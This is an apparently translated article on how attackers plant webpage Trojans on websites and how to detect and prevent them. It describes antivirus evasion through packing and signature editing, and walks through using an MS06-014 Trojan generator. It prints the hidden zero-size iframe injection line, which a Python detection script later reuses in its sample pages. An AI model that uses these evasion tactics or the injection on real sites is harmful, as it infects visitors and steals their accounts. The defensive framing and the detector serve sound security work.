Analyze and clear webpage Trojans on the web server

Source: Internet
Author: User

Using a browser that is not built on the IE engine is relatively safer.

Many of my friends have run into this: you open a website, and before the page has even finished rendering, the antivirus software raises an alarm saying it has detected a Trojan. Experienced users know this means malicious webpage code, but the site they opened is a legitimate one. No legitimate website would put a virus on its own pages, so what causes this? One of the likeliest explanations is that the website has had a Trojan planted on it.

The term "Trojan mounting" (planting a Trojan on a website) comes up constantly now. What does it mean? A hacker breaks into a website and embeds a webpage Trojan in the site's homepage, then uses the hacked site's own traffic to spread that webpage Trojan for the hacker's own ends. For example, many game websites have Trojans mounted on them so the hacker can steal the game accounts of players browsing the site, while large, high-traffic sites are targeted in order to collect a large number of bots. A site with a mounted Trojan not only loses credibility and a large number of customers; its ordinary visitors also fall into the trap the hacker has set and become the hacker's zombies. Let's take a look at this currently most popular attack method.

The core of Trojan mounting: the Trojan

From the phrase "Trojan mounting" you can already tell that the technique is inseparable from Trojans. Indeed, the purpose of mounting is to spread a Trojan; mounting itself is only the means. Trojans fall into two categories. The first is the remote-control Trojan: a hacker launches a mounting campaign with this type of Trojan in order to collect a large number of bots, for example to launch a denial-of-service attack against some website or for other purposes (at present the vast majority of computers taking part in denial-of-service attacks are victims of Trojan mounting). The second is the keylogging Trojan, which we usually call an account-stealing Trojan; its purpose is self-evident and is aimed at our game accounts or bank accounts. Most Trojans used in mounting today belong to the latter category.

Evasion ("kill-free") tactics

A Trojan used for mounting must be highly concealed, so that users run it without noticing and so that the Trojan page survives for longer. Hackers use many tricks to keep a Trojan from being detected and removed by antivirus software; the following methods are the usual ones:

Packing ("shelling"): we introduced the concept of the packer earlier: it stops others from modifying a compiled program file and compresses the program's size. Once a Trojan has been packed it may escape antivirus scanning and removal; this is also why a machine with antivirus software installed can still be infected by an old virus. Current antivirus software does unpack a program before scanning it, but only for some popular packers such as ASPack and UPX; when a Trojan has been processed with an obscure packer, the scanner is powerless. Packing is therefore still one of the common evasion tactics used by hackers.

An obscure packer

Signature modification: antivirus software decides whether a program is a virus based on virus signatures. When the software scans a program and finds a virus signature in it, the program is treated as a virus. Hackers understand this too, so they modify the part of the Trojan's code that is identified as the signature, encrypting it or using assembly instructions to redirect around it, so that the antivirus software can no longer find the signature in the Trojan and no longer treats it as a virus.

Although both methods let a Trojan survive antivirus detection and removal, we still have ways to stop the Trojan from running; the specific methods are described in the prevention section. So how is a Trojan mounted on a website? Here we take the "Gray Pigeon" Trojan as an example to demonstrate the process. The Gray Pigeon sample used in the demonstration has already been made undetectable, so antivirus software cannot detect it.

The latent attacker: the webpage Trojan

Why does a Trojan program run when a webpage is opened? This brings in the concept of the webpage Trojan: a combination of a Trojan and a webpage, such that opening the page also runs the Trojan. The original webpage Trojans relied on the ActiveX controls of the IE browser: when such a page runs, a download prompt is displayed, and the Trojan runs only after the user clicks OK. This kind of webpage Trojan still had some value when general awareness of network security was low, but its drawback is obvious: the ActiveX control download prompt appears. Of course, few people will click OK on an unexplained ActiveX control download confirmation window.

So a new kind of webpage Trojan was born. These webpage Trojans usually exploit vulnerabilities in the IE browser; nothing is prompted while they run, so they are extremely concealed. It is fair to say that the endless stream of vulnerabilities in Internet Explorer is what has made webpage Trojans so rampant today. For example, the recent IE browser vulnerability MS06-014 can be used to create a completely hidden webpage Trojan. Next, let's look at the process of making a webpage Trojan with MS06-014.

Of course, a webpage Trojan needs a Trojan program; here we use the Gray Pigeon Trojan mentioned above. Then we download an MS06-014 webpage Trojan generator. Finally, we need some web hosting space. With these three things ready, testing can begin.

Generating the webpage Trojan

First, upload the Trojan program to the web space. Run the MS06-014 Trojan generator, enter the URL of the Trojan that was uploaded to the space in the Trojan address field, and tick the "Hide source code" option below it. This option automatically clears the webpage's source after the webpage Trojan runs, so that even a suspicious user cannot find any trace. Of course, only the source shown to the user is cleared; the webpage Trojan itself is unaffected. Click "Generate web Trojan" to produce a webpage Trojan named "muma.htm" in the program's own directory.

Configuring the webpage Trojan

Continue configuring the webpage Trojan by browsing to the generated page under "Webpage to encrypt". The webpage Trojan exploits the IE vulnerability when it runs, so it must contain exploit code, and that code will be detected by antivirus software. It is therefore not enough to make the Trojan program itself undetectable; the webpage Trojan also has to be encrypted. The MS06-014 Trojan generator provides four webpage encryption methods: null-character encryption, escape-character encryption, Escape encryption and signature splitting. Here we use "Escape character encryption": select that option and click the "Encrypt" button to generate an undetectable webpage Trojan. Then upload the encrypted webpage Trojan to the web space.

Finding vulnerable websites and planting the webpage Trojan

With the webpage Trojan ready, all that remains is to find a target website to mount it on. At this point hackers search everywhere for website programs with script flaws; once one is found, they exploit the vulnerability in the website program to break into the site and obtain a webshell on it. With that, the homepage content can be edited and the Trojan code inserted: `<iframe src="/muma.htm" width="0" height="0" frameborder="0"></iframe>`, where the src parameter holds the address of the webpage Trojan. When the site's homepage is opened, the webpage Trojan page pops up, but we cannot see it, because the code sets the pop-up window's width to 0. By then the Trojan has been quietly downloaded to the local machine and run. The homepage looks normal and the antivirus software does not react, yet the Trojan is running. The concealment of Trojan mounting is thus very high, and the harm quite serious.

Trojan mounting has become the most popular attack method today. How do we defend against the large number of websites with mounted Trojans? As a webmaster, how do you know your own site has had a Trojan mounted on it? Webmaster prevention: if you are a webmaster, you can check the source code of the homepage and other main pages. For example, open these pages in Notepad and search for the keyword "<iframe>"; at each hit, check whether it is Trojan code. Experienced hackers, however, will write a piece of code that encrypts the entire Trojan snippet, which makes the Trojan code hard to find on the page. In that case you can use a system built specifically for detecting webpage Trojan code, produced by the Beijing Zhiheng Alliance, which helps with the large volume of code and the many forms webpage Trojans take that make them hard to check; with regular updates it can detect more than 1000 types of webpage Trojan.
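The Notepad search described above can be automated. The Python script below is an added example written for this page, not code from the original article or from any product it mentions: it walks a web root, flags `<iframe>` tags whose width, height or style make them invisible (the shape of the injected line in the previous section), and adds a heuristic for script blocks that feed a long `%`-encoded run into `unescape()`, which is what the escape-character encryption mentioned earlier produces. The sample pages, the `/muma.htm` path (taken from the article's own example name), the `example.invalid` host and the list of page extensions are all constructed assumptions for the demonstration.

```python
import os
import re
from dataclasses import dataclass

# <iframe ...> opening tags; group 1 is the raw attribute text.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value", name='value' or bare name=value attribute pairs.
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
# unescape() applied to a long %XX / %uXXXX run is the shape of the
# "escape character encryption" the article describes.
UNESCAPE_RE = re.compile(r"unescape\s*\(", re.IGNORECASE)
PERCENT_RUN_RE = re.compile(r"(?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}){16,}")


@dataclass
class Finding:
    kind: str    # "hidden-iframe" or "escape-encoded-script"
    detail: str  # the iframe src, or a short description


def parse_attrs(attr_text):
    """Return a lower-cased dict of the attributes found in one tag."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        # Exactly one of the three value groups matched; take it.
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value.strip()
    return attrs


def is_zero_size(value):
    """True for width/height values such as "0" or "0px"; False for "" or "600"."""
    digits = value.strip().lower().removesuffix("px").strip()
    try:
        return float(digits) <= 0
    except ValueError:
        return False


def hidden_by_style(style):
    """True if an inline style hides the element or collapses it to nothing."""
    s = style.lower().replace(" ", "")
    return any(tok in s for tok in ("display:none", "visibility:hidden", "width:0", "height:0"))


def scan_html(html):
    """Return the suspicious constructs found in one page's source, in document order."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        if (is_zero_size(attrs.get("width", "")) or is_zero_size(attrs.get("height", ""))
                or hidden_by_style(attrs.get("style", ""))):
            findings.append(Finding("hidden-iframe", attrs.get("src", "")))
    if UNESCAPE_RE.search(html) and PERCENT_RUN_RE.search(html):
        findings.append(Finding("escape-encoded-script",
                                "unescape() over a long %-encoded run"))
    return findings


def scan_directory(root, extensions=(".htm", ".html", ".asp", ".php", ".jsp")):
    """Walk a web root (assumed extension list) and return {path: findings} for pages with hits."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read())
                if found:
                    report[path] = found
    return report


# Constructed sample pages for a stand-alone run (not taken from any real site).
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="/news.htm" width="600" height="400"></iframe>
</body></html>"""

ENCODED_RUN = "%u0041" * 20  # constructed 20-unit %u run, long enough to trip PERCENT_RUN_RE
INJECTED_PAGE = f"""<html><body><h1>Welcome</h1>
<iframe src="/muma.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://example.invalid/x.htm" style="display:none"></iframe>
<script>document.write(unescape("{ENCODED_RUN}"))</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for f in scan_html(page):
            print(f"{label}: {f.kind} -> {f.detail}")
```

Run it against a copy of the site's document root with `scan_directory("/path/to/webroot")`; every page that returns a finding should be diffed against a known-good backup, since a legitimate zero-height iframe is rare enough that each hit deserves a manual look. The heuristics are deliberately simple and will miss a snippet that is obfuscated some other way, so they complement rather than replace the dedicated detection tools the article refers to.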

Ordinary-user prevention: ordinary users care about how to guard against mounted Trojans. Since antivirus software is blind to webpage Trojans, we cannot tell whether a website has had a Trojan mounted on it. Is there really nothing to be done? We already know that webpage Trojans work by exploiting vulnerabilities in the IE browser, so as long as we apply system patches promptly, webpage Trojans are rendered ineffective. To enable Automatic Updates, right-click "My Computer", select "Properties", switch to the "Automatic Updates" tab, and select "Automatic (recommended)".
